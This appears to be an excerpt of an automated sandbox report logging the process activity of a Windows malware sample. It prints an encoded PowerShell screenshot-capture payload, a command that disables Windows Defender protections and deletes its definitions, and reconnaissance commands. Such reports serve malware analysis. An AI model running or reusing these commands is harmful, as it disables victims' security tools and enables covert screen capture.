Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Code function: 0_2_00007FF7691C8880 cpuid

0_2_00007FF7691C8880

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

4_2_0093D0AB

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
